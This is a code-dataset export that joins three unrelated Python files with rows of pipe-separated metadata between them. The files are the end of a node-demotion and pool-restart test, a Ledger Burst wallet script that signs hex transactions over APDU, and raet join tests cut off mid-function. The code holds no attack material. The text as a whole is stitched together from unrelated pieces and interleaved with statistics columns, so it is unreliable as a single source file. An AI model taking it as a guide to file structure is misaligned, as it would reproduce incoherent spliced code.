    primary_r2_alias = get_node_alias(R2_PRIMARY_ID)
    primary_r2_did = get_node_did(primary_r2_alias, pool_info=pool_info)
    # eventually() retries the demotion — presumably until the NODE txn is
    # written; confirm against system.utils.
    await eventually(
        demote_node, pool_handler, wallet_handler, trustee_did, primary_r2_alias, primary_r2_did
    )
    logger.info("4 Restart the whole pool right after Demote NODE txn is written on all nodes")
    restart_pool(hosts)
    logger.info("5 Make sure that the pool restarted correctly, and can order txns")
    logger.info("5.1 ensure that pool is in sync")
    # TODO timeouts
    # The demoted node (Node3) is excluded from the sync check.
    await ensure_pool_is_in_sync(node_ids=[h.id for h in hosts if h.id != R2_PRIMARY_ID])
    logger.info("5.2 ensure that pool orders requests")
    await ensure_pool_is_functional(pool_handler, wallet_handler, trustee_did, timeout=60)
| 41.202381
| 109
| 0.779399
| 1,018
| 6,922
| 4.899804
| 0.144401
| 0.079391
| 0.122694
| 0.173216
| 0.825982
| 0.795309
| 0.788492
| 0.78769
| 0.781075
| 0.74158
| 0
| 0.0159
| 0.145912
| 6,922
| 167
| 110
| 41.449102
| 0.827808
| 0.034383
| 0
| 0.586777
| 0
| 0
| 0.117268
| 0.00659
| 0
| 0
| 0
| 0.005988
| 0
| 1
| 0
| false
| 0
| 0.049587
| 0
| 0.049587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64056be035ca02963a80ec789e08168e7ca33304
| 11,661
|
py
|
Python
|
test.py
|
ohager/app-ledger-burst
|
0e48986571ef820d7b2d5472ffdbc58c882363b1
|
[
"Apache-2.0"
] | 5
|
2020-05-18T17:46:36.000Z
|
2020-05-22T13:34:00.000Z
|
test.py
|
ohager/app-ledger-burst
|
0e48986571ef820d7b2d5472ffdbc58c882363b1
|
[
"Apache-2.0"
] | null | null | null |
test.py
|
ohager/app-ledger-burst
|
0e48986571ef820d7b2d5472ffdbc58c882363b1
|
[
"Apache-2.0"
] | 3
|
2020-07-08T09:52:00.000Z
|
2021-07-07T17:10:39.000Z
|
# Manual smoke-test script for the Burst Ledger hardware-wallet app:
# drives the device through raw APDU exchanges via ledgerblue.
from ledgerblue.comm import getDongle
from ledgerblue.commException import CommException
# from secp256k1 import PublicKey
import binascii
import codecs
# Open the dongle with APDU debug logging enabled.
dongle = getDongle(True)
# APDU class byte used by this app for every command.
CLA = "80"
# Derivation path, header of 44'/30' used on the App
ACCOUNT = "00"
CHANGE = "00"
INDEX = "01"
P1 = "00"
P2 = "00"
# Instructions accepted by the Burst Ledger App
INS_GET_VERSION = "01"
INS_AUTH_SIGN_TXN = "03"
INS_ENCRYPT_DECRYPT_MSG = "04"
INS_SHOW_ADDRESS = "05"
INS_GET_PUBLIC_KEY = "06"
# APDU: query app version (no payload, LEN=0).
INS = INS_GET_VERSION
LEN = "00"
DATA = ""
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("version ", binascii.hexlify(ret))
# APDU: fetch the public key for derivation indices ACCOUNT/CHANGE/INDEX
# (3 payload bytes, hence LEN = "03").
INS = INS_GET_PUBLIC_KEY
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
# ret[0] is the app status byte; bytes 1..32 carry the 32-byte public key.
print("ret ", str(ret[0]))
print("publicKey ", binascii.hexlify(ret[1:1+32]))
# Show the address for the given index, blocks for user input (wait for an accept)
INS = INS_SHOW_ADDRESS
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
# Each signing flow below is two APDUs: P1=0x11 sends the whole transaction
# in one chunk (sign init + on-device authorize), then P1=0x03 (sign finish)
# sends the derivation path and returns status byte + 64-byte signature.
# An ordinary payment transaction
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0010b40ad80ae803c980cdc2fded5c1d402fc37eb46eee66706574f037469d47da14f9d7df53f834b6592e05e1c7d3a900e1f505000000008096980000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005191020085834c122c1c5665"
LEN = "b0" # 176
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
P2 = "00"
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token transfer transaction
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0211223fd80ae80334a7ca8bbded4e3f24c60ecb655f9235ac1b12d97aea698c554df8bf1d950f2db6592e05e1c7d3a900000000000000008096980000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008a9102008981c4210120df530151a4f5468b89f5faa00f000000000000"
LEN = "c1" # 193
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
P2 = "00"
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token transfer transaction (TRT)
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0211e405d90aa005416d25901e5b4f8e03d00c92fd508798d3794883e4a73630ab9e88454b7aed49d84228d09c9f7e2d0000000000000000b0dfc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009a7b0b0025241b746d4b92e2018409fe8f2e3b1eace803000000000000"
LEN = "c1" # 193
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token buy offer (TRT)
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "02130609d90aa005416d25901e5b4f8e03d00c92fd508798d3794883e4a73630ab9e88454b7aed4900000000000000000000000000000000209586000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a27b0b00add44456cab796a4018409fe8f2e3b1eac50c3000000000000c409000000000000"
LEN = "c9" # 201
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
P2 = "00"
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Token cancel offer
INS = INS_AUTH_SIGN_TXN
P1 = "11" # sign init and authorize
DATA = "0215840cd90aa005416d25901e5b4f8e03d00c92fd508798d3794883e4a73630ab9e88454b7aed4900000000000000000000000000000000209586000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a47b0b0065491ec2c52052c7019567ff4148b62b98"
LEN = "b9" # 185
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
# Register a contract total length is 2598 (a26 in hex), send the first 176 bytes and later the remaining length
DATA_CONTRACT = "1610537eda0aa0050f60494941ed795b7296174a58dd9946eda87c07fe29cd16a561ab72429a5d010000000000000000000000000000000030fab1050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e8930200aa466d324c0de0a101054254444558210042544445582073656c6c20636f6e74726163742031353839383133373436333933020000000a00010001000100002d3101000000001d0901170000001800000000000000320b0335040116000000303304030c0000003500010d0000001e0d00000007283507030c000000320a033504010f0000003506030e0000003209033504011300000001100000003587d5c34408df950710000000130000001e1000000010120f0100001a1800000001100000002b665d12e76b8b940710000000130000001e100000001e350501180000003506011a00000012fa0100001a18000000011000000031276f22f01aad700710000000130000001e100000001e350501180000003506011a000000127d0300001a180000000110000000b00e004992c79bd80710000000130000001e10000000173505011800000012b60700001a180000001a1800000002100000000600000007100000000f0000001b100000000b1af901000001110000002000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1af90100000210000000050000000610000000040000001010000000101600000011100000001111000000331601100000003302041100000002100000000500000007100000000700000010100000001111000000331601060000003302041100000003110000001011000000110600000003110000001011000000110300000033160100000000320304130111000000010000000000000010110000001111000000021000000003000000071000000011000000101000000011100000001b100000000b1a4d0300000211000000170000000e100000001100000010100000001111000000021000000005000000071000000011000000101000000011100000001b100000000b1a4d030000021100000017000000041100000004110000000e100000001100000010100000001111000000021000000004000000071000000011000000101000000011100000001b100000000b1a4d030000021100000017000000041100000004110000000e100000001100000010100000000211000000170
000000e10000000110000001010000000111100000011100000000610000000110000001010000000111100000002100000000e0000000710000000110000001010000000111000000003110000002010000000110000000f1a5c0300003316010f0000003302040e00000013011100000020000000000000001011000000110300000002060000000f0000001301110000002000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1a570400001016000000111000000007100000000f0000001b100000000b1a570400000211000000170000000e100000001100000010100000001108000000021100000017000000041100000004110000000e10000000110000001010000000110900000001110000000002000000000000101100000011110000000210000000030000000a10000000110000001010000000110300000001110000002000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1a3005000002100000000600000007100000000f0000001b100000000b1a300500000211000000170000000e10000000110000001010000000110a000000021100000017000000041100000004110000000e10000000110000001010000000110b00000001110000000004000000000000101100000011110000000210000000030000000a10000000110000001010000000110300000001110000000001000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002110000000110000000f1ab105000002100000000100000007100000000f0000001e100000000b1a6706000002100000000200000007100000000f0000001e100000000b1a6706000001110000000006000000000000101100000011110000000210000000030000000b1000000011000000101000000001110000000006000000000000101100000011110000001110000000071000000011000000101000000011100000001b100000000b1ab507000002100000000800000007100000000a000000101000000011100000001b100000000b1ab507000002100000000900000007100000000b000000101000000011100000001b100000000b1ab50700000211000000170000000e10000000110000001010000000021100000017000000041100000004110000000e1000000011000000101000000011110000001110000000061000000011000000101000000002100000000400000006100000000500000010100000001110000000061000000
005000000101000000011100000000710000000070000001010000000111100000011100000000710000000110000001010000000111000000003110000002010000000110000000f1a8d0700000211000000170000000e100000001100000010100000001016000000111000000011110000003316011000000033020411000000021100000017000000041100000004110000000e100000001100000010100000001111000000331601060000003302041100000003110000001011000000110600000003110000001011000000110300000033160100000000320304131016000000111000000007100000000f0000001b100000000b1a1c09000001110000001000000000000000101100000011110000000210000000030000000710000000110000001010000000111000000003110000002010000000110000000f1a1c0900000211000000170000000e10000000110000001010000000110400000001110000000100000000000000101100000011030000000211000000170000000e100000001100000010100000000311000000101100000011110000001110000000071000000011000000101000000011100000001b100000000b1ac50800000311000000101100000011050000000311000000101100000011030000001016000000331601160000003203041335000410000000101000000011050000000211000000170000000e10000000110000001010000000011100000090010000000000001011000000111100000011100000000910000000110000001010000000110700000013180e640300000000002b308f6b8f15f951a23677e9ce2322cf"
# Register a contract: the payload (2598 bytes) exceeds one APDU, so it is
# streamed in 255-byte chunks: sign-init (P1=0x01), sign-continue (P1=0x02)
# for each full middle chunk, sign-continue-and-authorize (P1=0x12) for the
# final partial chunk, then sign-finish (P1=0x03) to fetch the signature.
print(len(DATA_CONTRACT))
INS = INS_AUTH_SIGN_TXN
P1 = "01" # sign init
LEN = "ff" # 255 bytes per full chunk
DATA = DATA_CONTRACT[0:255*2]
DATA_CONTRACT = DATA_CONTRACT[255*2:]
print('data len: ', len(DATA))
print('remaining: ', len(DATA_CONTRACT))
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
while len(DATA_CONTRACT) > 255*2:
    P1 = "02" # sign continue; LEN stays "ff" for every full chunk
    DATA = DATA_CONTRACT[0:255*2]
    DATA_CONTRACT = DATA_CONTRACT[255*2:]
    print('data len: ', len(DATA))
    print('remaining: ', len(DATA_CONTRACT))
    ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
    print("ret ", str(ret[0]))
P1 = "12" # sign continue and authorize (final data chunk)
DATA = DATA_CONTRACT
print('data len: ', len(DATA))
# Length byte = bytes remaining (half the hex length). Zero-pad to two hex
# digits: plain 'x' would emit a single digit for remainders under 16 bytes,
# producing an odd-length string that bytearray.fromhex rejects.
LEN = format(len(DATA) >> 1, '02x')
print(LEN)
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
P1 = "03" # sign finish
LEN = "03"
DATA = ACCOUNT + CHANGE + INDEX
ret = dongle.exchange(bytearray.fromhex(CLA + INS + P1 + P2 + LEN + DATA))
print("ret ", str(ret[0]))
print("sig ", binascii.hexlify(ret[1:1+64]))
| 76.215686
| 5,214
| 0.867936
| 723
| 11,661
| 13.929461
| 0.175657
| 0.017377
| 0.022639
| 0.043888
| 0.214676
| 0.210803
| 0.208917
| 0.208917
| 0.208917
| 0.208917
| 0
| 0.63501
| 0.067233
| 11,661
| 152
| 5,215
| 76.717105
| 0.290889
| 0.06183
| 0
| 0.685039
| 0
| 0
| 0.672564
| 0.650105
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.031496
| 0
| 0.031496
| 0.244094
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff3ea5e356dcc4b5f6ac20119827d7e3252ea81a
| 603,116
|
py
|
Python
|
raet/road/test/test_joining.py
|
renich/raet
|
6bd9c268db07d24373db734e63e11b6fff5f3e0e
|
[
"Apache-2.0"
] | null | null | null |
raet/road/test/test_joining.py
|
renich/raet
|
6bd9c268db07d24373db734e63e11b6fff5f3e0e
|
[
"Apache-2.0"
] | null | null | null |
raet/road/test/test_joining.py
|
renich/raet
|
6bd9c268db07d24373db734e63e11b6fff5f3e0e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Tests for the join transaction
'''
# pylint: skip-file
# pylint: disable=C0103
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import os
import sys
import time
import tempfile
import shutil
from collections import deque
from ioflo.aid.odicting import odict
from ioflo.aid.timing import Timer, StoreTimer
from ioflo.aid.aiding import packByte
from ioflo.base.storing import Store
from ioflo.base.consoling import getConsole
console = getConsole()
# Import raet libs
from raet.abiding import * # import globals
from raet import raeting, nacling
from raet.road import estating, keeping, stacking, packeting, transacting
# Root directory for per-test temporary files; Windows has no /tmp, so a
# fixed temp root is used there and created on demand.
TEMPDIR = 'c:\\temp' if sys.platform == 'win32' else '/tmp'
if sys.platform == 'win32' and not os.path.exists(TEMPDIR):
    os.mkdir(TEMPDIR)
def setUpModule():
    # Lower console verbosity to concise for this module's whole test run.
    console.reinit(verbosity=console.Wordage.concise)
def tearDownModule():
    # No module-level teardown required.
    pass
class BasicTestCase(unittest.TestCase):
""""""
def setUp(self):
    # Deterministic simulated clock shared by all stacks under test.
    self.store = Store(stamp=0.0)
    self.timer = StoreTimer(store=self.store, duration=1.0)
    # Fresh keep directory per test; removed again in tearDown.
    self.base = tempfile.mkdtemp(prefix="raet", suffix="base", dir=TEMPDIR)
def tearDown(self):
    # Remove this test's temporary keep directory, if setUp created it.
    if os.path.exists(self.base):
        shutil.rmtree(self.base)
def createRoadData(self,
                   base,
                   name='',
                   ha=None,
                   main=None,
                   auto=raeting.AutoMode.never.value,
                   role=None,
                   sigkey=None,
                   prikey=None,
                   kind=None,
                   mutable=None, ):
    '''
    Build an odict of parameters used to set up a road stack.

    Signing and private key material is derived via nacling from sigkey
    and prikey (fresh keys when None); role defaults to the stack name
    and the keep dirpath is rooted under base.
    '''
    signer = nacling.Signer(sigkey)
    privateer = nacling.Privateer(prikey)
    # Insertion order matches the historical field order of the keep data.
    return odict([('name', name),
                  ('ha', ha),
                  ('main', main),
                  ('auto', auto),
                  ('role', role if role is not None else name),
                  ('kind', kind),
                  ('mutable', mutable),
                  ('dirpath', os.path.join(base, 'road', 'keep', name)),
                  ('sighex', signer.keyhex),
                  ('verhex', signer.verhex),
                  ('prihex', privateer.keyhex),
                  ('pubhex', privateer.pubhex)])
def createRoadStack(self,
                    data,
                    uid=None,
                    ha=None,
                    main=None,
                    auto=None,
                    role=None,
                    kind=None,
                    mutable=None, ):
    '''
    Build a RoadStack from data, letting each keyword argument override
    the corresponding data entry, and return the new stack.
    '''
    # ha falls back on truthiness; the rest fall back only on None so a
    # caller can still pass explicit falsy overrides (e.g. main=False).
    ha = ha or data['ha']
    main = main if main is not None else data['main']
    role = role if role is not None else data['role']
    auto = auto if auto is not None else data['auto']
    kind = kind if kind is not None else data['kind']
    mutable = mutable if mutable is not None else data['mutable']
    return stacking.RoadStack(store=self.store,
                              name=data['name'],
                              uid=uid,
                              ha=ha,
                              main=main,
                              role=role,
                              sigkey=data['sighex'],
                              prikey=data['prihex'],
                              auto=auto,
                              kind=kind,
                              mutable=mutable,
                              dirpath=data['dirpath'],)
def join(self, initiator, correspondent, deid=None, duration=1.0,
         cascade=False, renewal=False):
    '''
    Utility: run a join transaction from initiator toward correspondent
    and service both stacks until it completes or duration expires.
    '''
    console.terse("\nJoin Transaction **************\n")
    if not initiator.remotes:
        # First contact: add a vacuous remote (fuid=0, sid=0) and target it.
        estate = estating.RemoteEstate(stack=initiator,
                                       fuid=0,  # vacuous join
                                       sid=0,  # always 0 for join
                                       ha=correspondent.local.ha)
        deid = initiator.addRemote(estate).uid
    initiator.join(uid=deid, cascade=cascade, renewal=renewal)
    self.serviceStacks([correspondent, initiator], duration=duration)
def allow(self, initiator, correspondent, deid=None, duration=1.0,
          cascade=False):
    '''
    Utility: run an allow transaction from initiator and service both
    stacks until it completes or duration expires.
    '''
    console.terse("\nAllow Transaction **************\n")
    initiator.allow(uid=deid, cascade=cascade)
    stacks = [correspondent, initiator]
    self.serviceStacks(stacks, duration=duration)
def alive(self, initiator, correspondent, duid=None, duration=1.0,
          cascade=False):
    '''
    Utility: run an alive transaction from initiator and service both
    stacks until it completes or duration expires.
    '''
    console.terse("\nAlive Transaction **************\n")
    initiator.alive(uid=duid, cascade=cascade)
    stacks = [correspondent, initiator]
    self.serviceStacks(stacks, duration=duration)
def flushReceives(self, stack):
    '''
    Flush any queued up udp packets in receive buffer
    '''
    # Pull pending datagrams off the socket, then discard them unprocessed.
    stack.serviceReceives()
    stack.rxes.clear()
def dupReceives(self, stack):
    '''
    Duplicate every queued udp packet in the receive buffer so each
    packet will be processed twice (simulates duplicate delivery).
    '''
    stack.serviceReceives()
    pending = stack.rxes
    stack.rxes = deque()
    for rx in pending:
        stack.rxes.extend((rx, rx))  # the original followed by its copy
def serviceStacksDropRx(self, stacks, drop=None, duration=1.0):
    '''
    Utility: service queues for the given stacks until every transaction
    completes or duration expires, while discarding all received packets
    for any stack listed in drop (simulates one-way packet loss).

    Parameters:
        stacks: road stacks to service
        drop: stacks whose rx queues are cleared each pass (default none)
        duration: wall-clock seconds to keep servicing
    '''
    # None sentinel instead of a mutable [] default, which would be a
    # single shared list across all calls.
    if drop is None:
        drop = []
    self.timer.restart(duration=duration)
    while not self.timer.expired:
        for stack in stacks:
            stack.serviceReceives()
            if stack in drop:
                stack.rxes.clear()  # drop everything this stack received
            stack.serviceRxes()
            stack.process()
            stack.serviceAllTx()
        if all([not stack.transactions for stack in stacks]):
            break
        # Advance the simulated store clock in lockstep with real time.
        self.store.advanceStamp(0.05)
        time.sleep(0.05)
def serviceStacks(self, stacks, duration=1.0):
    '''
    Utility: service rx/tx queues for the given stacks until every
    transaction completes or duration expires.
    '''
    self.timer.restart(duration=duration)
    while not self.timer.expired:
        for stack in stacks:
            stack.serviceAll()
        if not any(stack.transactions for stack in stacks):
            break  # all transactions resolved; stop early
        self.store.advanceStamp(0.05)
        time.sleep(0.05)
def bootstrapJoinedRemotes(self, autoMode=raeting.AutoMode.once.value):
    '''
    Build a main alpha stack and a non-main beta stack with cleared
    keeps, join beta to alpha, assert the join succeeded on both sides,
    and return (alpha, beta).
    '''
    alphaData = self.createRoadData(base=self.base,
                                    name='alpha',
                                    ha=("", raeting.RAET_PORT),
                                    main=True,
                                    auto=autoMode)
    keeping.clearAllKeep(alphaData['dirpath'])
    alpha = self.createRoadStack(data=alphaData)
    betaData = self.createRoadData(base=self.base,
                                   name='beta',
                                   ha=("", raeting.RAET_TEST_PORT),
                                   main=None,
                                   auto=autoMode)
    keeping.clearAllKeep(betaData['dirpath'])
    beta = self.createRoadStack(data=betaData)
    console.terse("\nJoin from Beta to Alpha *********\n")
    # Preconditions: no remotes yet, mutability unset on both stacks.
    self.assertTrue(alpha.main)
    self.assertIs(alpha.keep.auto, autoMode)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertIs(beta.main, None)
    self.assertIs(beta.keep.auto, autoMode)
    self.assertEqual(len(beta.remotes), 0)
    self.assertIs(beta.mutable, None)
    self.assertIs(alpha.mutable, None)
    self.join(beta, alpha)
    # Postconditions: each side holds exactly one joined remote that has
    # not yet been allowed or alived.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    return alpha, beta
def bootstrapStacks(self, autoMode=raeting.AutoMode.once.value):
    '''
    Build a main alpha stack and a non-main beta stack with cleared
    keeps, assert their pristine initial state, and return (alpha, beta)
    without joining them.
    '''
    alphaData = self.createRoadData(base=self.base,
                                    name='alpha',
                                    ha=("", raeting.RAET_PORT),
                                    main=True,
                                    auto=autoMode)
    keeping.clearAllKeep(alphaData['dirpath'])
    alpha = self.createRoadStack(data=alphaData)
    betaData = self.createRoadData(base=self.base,
                                   name='beta',
                                   ha=("", raeting.RAET_TEST_PORT),
                                   main=None,
                                   auto=autoMode)
    keeping.clearAllKeep(betaData['dirpath'])
    beta = self.createRoadStack(data=betaData)
    # Both stacks start with no remotes and mutability unset.
    self.assertTrue(alpha.main)
    self.assertIs(alpha.keep.auto, autoMode)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertIs(beta.main, None)
    self.assertIs(beta.keep.auto, autoMode)
    self.assertEqual(len(beta.remotes), 0)
    self.assertIs(beta.mutable, None)
    self.assertIs(alpha.mutable, None)
    return alpha, beta
def bootstrapStack(self,
                   name='',
                   ha=None,
                   main=None,
                   auto=raeting.AutoMode.never.value,
                   role=None,
                   sigkey=None,
                   prikey=None,
                   kind=None,
                   mutable=None, ):
    '''
    Build a single road stack from the given parameters with a cleared
    keep, assert that the stack reflects those parameters, and return
    the (stack, data) pair.
    '''
    data = self.createRoadData(base=self.base,
                               name=name,
                               ha=ha,
                               main=main,
                               auto=auto,
                               role=role,
                               sigkey=sigkey,
                               prikey=prikey,
                               kind=kind,
                               mutable=mutable)
    keeping.clearAllKeep(data['dirpath'])
    stack = self.createRoadStack(data=data)
    # The stack and its data must both echo the requested configuration,
    # and the stack starts with no remotes.
    self.assertIs(stack.main, main)
    self.assertIs(data['main'], main)
    self.assertIs(stack.keep.auto, auto)
    self.assertIs(data['auto'], auto)
    self.assertIs(stack.kind, kind)
    self.assertIs(data['kind'], kind)
    self.assertIs(stack.mutable, mutable)
    self.assertIs(data['mutable'], mutable)
    self.assertEqual(len(stack.remotes), 0)
    return (stack, data)
def copyData(self, remote, fuid=None):
    '''
    Snapshot the fields of remote compared by sameAll/sameRoleKeys,
    optionally overriding the recorded fuid.
    '''
    return {'role': remote.role,
            'verhex': str(remote.verfer.keyhex.decode('ISO-8859-1')),
            'pubhex': str(remote.pubber.keyhex.decode('ISO-8859-1')),
            'name': remote.name,
            'ha': remote.ha,
            'fuid': fuid if fuid is not None else remote.fuid,
            'main': remote.main,
            'kind': remote.kind}
def sameRoleKeys(self, remote, data):
    '''
    Returns True if role and keys match, False otherwise
    '''
    if remote.role != data['role']:
        return False
    if remote.verfer.keyhex != ns2b(data['verhex']):
        return False
    return remote.pubber.keyhex == ns2b(data['pubhex'])
def sameAll(self, remote, data):
    '''
    Returns True if every compared field of remote (role, keys, name,
    ha, fuid, main, kind) matches data, False otherwise.
    '''
    if not self.sameRoleKeys(remote, data):
        return False
    return (remote.name == data['name'] and
            remote.ha == data['ha'] and
            remote.fuid == data['fuid'] and
            remote.main == data['main'] and
            remote.kind == data['kind'])
def testJoinBasic(self):
    '''
    Test join
    '''
    console.terse("{0}\n".format(self.testJoinBasic.__doc__))
    alphaData = self.createRoadData(base=self.base,
                                    name='alpha',
                                    ha=("", raeting.RAET_PORT),
                                    main=True,
                                    auto=raeting.AutoMode.once.value)
    keeping.clearAllKeep(alphaData['dirpath'])
    alpha = self.createRoadStack(data=alphaData)
    betaData = self.createRoadData(base=self.base,
                                   name='beta',
                                   ha=("", raeting.RAET_TEST_PORT),
                                   main=None,
                                   auto=raeting.AutoMode.once.value)
    keeping.clearAllKeep(betaData['dirpath'])
    beta = self.createRoadStack(data=betaData)
    console.terse("\nJoin from Beta to Alpha *********\n")
    # Preconditions: fresh stacks, no remotes on either side.
    self.assertTrue(alpha.main)
    self.assertIs(alpha.keep.auto, raeting.AutoMode.once.value)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertIs(beta.main, None)
    self.assertIs(beta.keep.auto, raeting.AutoMode.once.value)
    self.assertEqual(len(beta.remotes), 0)
    self.join(beta, alpha)
    # After join: one joined remote per side, not yet allowed or alived.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    console.terse("\nAllow Beta to Alpha *********\n")
    self.allow(beta, alpha)
    # After allow: the remotes report allowed and alived True.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertTrue(remote.allowed)
            self.assertIs(remote.alived, True)
    # Cleanup: close sockets and clear persisted keeps.
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinJointVacuuousMain(self):
    '''
    Test join vacuous,initiated by main both sides
    '''
    console.terse("{0}\n".format(self.testJoinJointVacuuousMain.__doc__))
    alphaData = self.createRoadData(base=self.base,
                                    name='alpha',
                                    ha=("", raeting.RAET_PORT),
                                    main=True,
                                    auto=raeting.AutoMode.once.value)
    keeping.clearAllKeep(alphaData['dirpath'])
    alpha = self.createRoadStack(data=alphaData)
    betaData = self.createRoadData(base=self.base,
                                   name='beta',
                                   ha=("", raeting.RAET_TEST_PORT),
                                   main=True,
                                   auto=raeting.AutoMode.once.value)
    keeping.clearAllKeep(betaData['dirpath'])
    beta = self.createRoadStack(data=betaData)
    console.terse("\nJoin Joint Alpha and Beta *********\n")
    self.assertIs(alpha.main, True)
    self.assertIs(alpha.keep.auto, raeting.AutoMode.once.value)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertIs(beta.main, True)
    self.assertIs(beta.keep.auto, raeting.AutoMode.once.value)
    self.assertEqual(len(beta.remotes), 0)
    console.terse("\nJoint Join Transaction **************\n")
    # Both mains initiate a vacuous join toward each other at once.
    remote = alpha.addRemote(estating.RemoteEstate(stack=alpha,
                                                   fuid=0,  # vacuous join
                                                   sid=0,  # always 0 for join
                                                   ha=beta.local.ha))
    alpha.join(uid=remote.uid, cascade=False, renewal=False)
    remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                  fuid=0,  # vacuous join
                                                  sid=0,  # always 0 for join
                                                  ha=alpha.local.ha))
    beta.join(uid=remote.uid, cascade=False, renewal=False)
    self.serviceStacks([alpha, beta], duration=2.0)
    # The simultaneous joins must resolve to one joined remote per side.
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
